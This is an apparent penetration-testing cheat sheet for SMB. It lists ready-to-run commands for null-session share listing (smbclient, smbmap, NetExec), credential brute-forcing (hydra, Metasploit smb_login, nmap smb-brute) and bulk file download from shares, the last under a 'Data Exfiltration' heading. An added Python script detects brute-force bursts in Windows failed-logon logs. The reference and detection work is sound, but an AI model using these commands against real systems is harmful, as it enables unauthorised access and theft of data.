SMB 139,445

SMB Enumeration and Scanning

Null Session Access

A null session is an SMB connection made with an empty username and password. If null sessions are not disabled, unauthenticated users can access network resources without credentials.

Tools:

  • smbclient: Command-line tool to interact with SMB shares.

  • smbmap: Python tool for SMB enumeration.

  • NetExec: A tool for testing null session access on multiple hosts.

Commands:

  • List shares:

    • smbclient --list //$IP

    • smbmap -H $IP

    • smbclient --no-pass --list //$IP (no password)

    • smbclient --user ''%'' --list //$IP (explicit null creds)

  • Open an interactive session:

    • smbclient //$IP/$SHARE_NAME

  • NetExec:

    • netexec smb $TARGETS -u '' -p '' --shares

Bruteforce SMB Authentication

Tools like hydra, Metasploit, and nmap can be used to brute-force SMB credentials.

Tools:

  • hydra: Tool for brute-force attacks.

  • Metasploit: Includes auxiliary scanner modules.

  • nmap: SMB brute-force script.

Commands:

  • Hydra example:

    • hydra -L usernames.txt -P passwords.txt $IP -V -f smb

  • Metasploit example:

    • msf5 > use auxiliary/scanner/smb/smb_login

  • Nmap example:

    • nmap --script smb-brute -p 445 $IP
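
On a Windows target, the brute-force attempts above appear as failed network logons (Security Event ID 4625, logon type 3). The following is an added example, not part of the original page: a sliding-window detector run over a constructed, simplified event export. The CSV layout, threshold and window are assumptions.

```python
import csv
import io
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample: simplified export of Windows Security events
# (time, event ID, logon type, target user, source IP). Not real log data.
SAMPLE = """\
2024-05-01T10:00:00,4625,3,alice,10.0.0.50
2024-05-01T10:00:02,4625,3,bob,10.0.0.50
2024-05-01T10:00:04,4625,3,carol,10.0.0.50
2024-05-01T10:00:06,4625,3,dave,10.0.0.50
2024-05-01T10:00:08,4625,3,erin,10.0.0.50
2024-05-01T10:00:10,4624,3,erin,10.0.0.50
2024-05-01T10:05:00,4625,3,frank,10.0.0.77
2024-05-01T11:30:00,4625,3,frank,10.0.0.77
2024-05-01T10:07:00,4625,2,alice,10.0.0.50
"""

def detect_bruteforce(text, threshold=5, window=timedelta(seconds=60)):
    """Return one finding per source IP that reaches `threshold` failed
    network logons (4625, logon type 3) inside a sliding `window`."""
    recent = defaultdict(deque)      # ip -> (time, user) failures still in window
    findings = {}                    # ip -> finding dict
    rows = sorted((r for r in csv.reader(io.StringIO(text)) if r),
                  key=lambda r: r[0])            # ISO timestamps sort as text
    for ts, event_id, logon_type, user, ip in rows:
        if logon_type != "3":        # keep network logons only (SMB and similar)
            continue
        when = datetime.fromisoformat(ts)
        if event_id == "4625":       # failed logon
            q = recent[ip]
            q.append((when, user))
            while when - q[0][0] > window:       # drop failures outside window
                q.popleft()
            if len(q) >= threshold:
                f = findings.setdefault(ip, {"ip": ip, "first_alert": ts,
                                             "users": set(), "success_after": None})
                f["users"].update(u for _, u in q)
        elif event_id == "4624" and ip in findings:
            # A success after the alert may mean a password was guessed.
            if findings[ip]["success_after"] is None:
                findings[ip]["success_after"] = user
    return list(findings.values())

if __name__ == "__main__":
    for finding in detect_bruteforce(SAMPLE):
        print(finding)
```

Many distinct usernames from one source suggests a list-driven run like the hydra command above; a populated success_after field marks the account to review first.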

Data Exfiltration

SMB tools can be used to download or share data from accessible SMB shares.

Tools/Commands:

  • smbclient (commands entered inside an interactive session):

    • recurse ON

    • prompt OFF

    • mget * (recursive file download)

  • NetExec:

    • netexec smb $TARGETS -u $USERNAME -p $PASSWORD -M spider_plus -o READ_ONLY=False
